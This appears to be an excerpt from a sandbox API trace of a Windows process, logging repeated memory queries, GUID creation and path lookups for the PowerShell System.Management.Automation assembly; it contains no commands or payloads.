	[0040.319] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.319] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.320] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.320] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.320] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.320] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.321] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.321] VirtualQuery (in: lpAddress=0x25ceec, lpBuffer=0x25deec, dwLength=0x1c | out: lpBuffer=0x25deec*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.321] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.322] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.322] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.322] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.322] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xb68da7aa, Data2=0x3288, Data3=0x4e16, Data4=([0]=0x8e, [1]=0x3d, [2]=0xdf, [3]=0x48, [4]=0x2a, [5]=0x9b, [6]=0x68, [7]=0x29))) returned 0x0
	[0040.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.322] GetLastError () returned 0x0
	[0040.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.322] GetLastError () returned 0x0
	[0040.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.323] GetLastError () returned 0x0
	[0040.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.323] GetLastError () returned 0x0
	[0040.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.323] GetLastError () returned 0x0
	[0040.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.323] GetLastError () returned 0x0
	[0040.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.323] GetLastError () returned 0x0
	[0040.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.323] GetLastError () returned 0x0
	[0040.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.323] GetLastError () returned 0x0
	[0040.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.323] GetLastError () returned 0x0
	[0040.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.323] GetLastError () returned 0x0
	[0040.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.323] GetLastError () returned 0x0
	[0040.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.323] GetLastError () returned 0x0
	[0040.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.323] GetLastError () returned 0x0
	[0040.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.323] GetLastError () returned 0x0
	[0040.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.324] GetLastError () returned 0x0
	[0040.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.324] GetLastError () returned 0x0
	[0040.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.324] GetLastError () returned 0x0
	[0040.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.324] GetLastError () returned 0x0
	[0040.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.324] GetLastError () returned 0x0
	[0040.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.324] GetLastError () returned 0x0
	[0040.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.324] GetLastError () returned 0x0
	[0040.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.324] GetLastError () returned 0x0
	[0040.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.324] GetLastError () returned 0x0
	[0040.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.324] GetLastError () returned 0x0
	[0040.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.324] GetLastError () returned 0x0
	[0040.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.324] GetLastError () returned 0x0
	[0040.325] VirtualQuery (in: lpAddress=0x25cd44, lpBuffer=0x25dd44, dwLength=0x1c | out: lpBuffer=0x25dd44*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.325] VirtualQuery (in: lpAddress=0x25cd80, lpBuffer=0x25dd80, dwLength=0x1c | out: lpBuffer=0x25dd80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.325] GetLastError () returned 0x0
	[0040.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dae4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.325] GetLastError () returned 0x0
	[0040.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dae4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.325] GetLastError () returned 0x0
	[0040.326] VirtualQuery (in: lpAddress=0x25ce4c, lpBuffer=0x25de4c, dwLength=0x1c | out: lpBuffer=0x25de4c*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.326] GetLastError () returned 0x0
	[0040.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dae4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.326] GetLastError () returned 0x0
	[0040.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dae4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.326] GetLastError () returned 0x0
	[0040.326] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x8108e168, Data2=0xdd59, Data3=0x4255, Data4=([0]=0xb1, [1]=0x3b, [2]=0xf4, [3]=0x74, [4]=0x95, [5]=0xff, [6]=0xab, [7]=0x25))) returned 0x0
	[0040.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.326] GetLastError () returned 0x0
	[0040.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.326] GetLastError () returned 0x0
	[0040.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.326] GetLastError () returned 0x0
	[0040.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.327] GetLastError () returned 0x0
	[0040.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.327] GetLastError () returned 0x0
	[0040.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.327] GetLastError () returned 0x0
	[0040.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.327] GetLastError () returned 0x0
	[0040.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.327] GetLastError () returned 0x0
	[0040.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.328] GetLastError () returned 0x0
	[0040.328] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x234a5a2c, Data2=0xccd6, Data3=0x45ee, Data4=([0]=0xba, [1]=0x2e, [2]=0xf2, [3]=0x4b, [4]=0x2c, [5]=0x3, [6]=0x2e, [7]=0xe7))) returned 0x0
	[0040.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.328] GetLastError () returned 0x0
	[0040.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.328] GetLastError () returned 0x0
	[0040.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.328] GetLastError () returned 0x0
	[0040.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.328] GetLastError () returned 0x0
	[0040.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.328] GetLastError () returned 0x0
	[0040.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.328] GetLastError () returned 0x0
	[0040.328] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xcb365ed6, Data2=0xdf7b, Data3=0x405a, Data4=([0]=0x85, [1]=0x3b, [2]=0xd2, [3]=0x43, [4]=0xe5, [5]=0x9e, [6]=0xe7, [7]=0x13))) returned 0x0
	[0040.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.329] GetLastError () returned 0x0
	[0040.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.329] GetLastError () returned 0x0
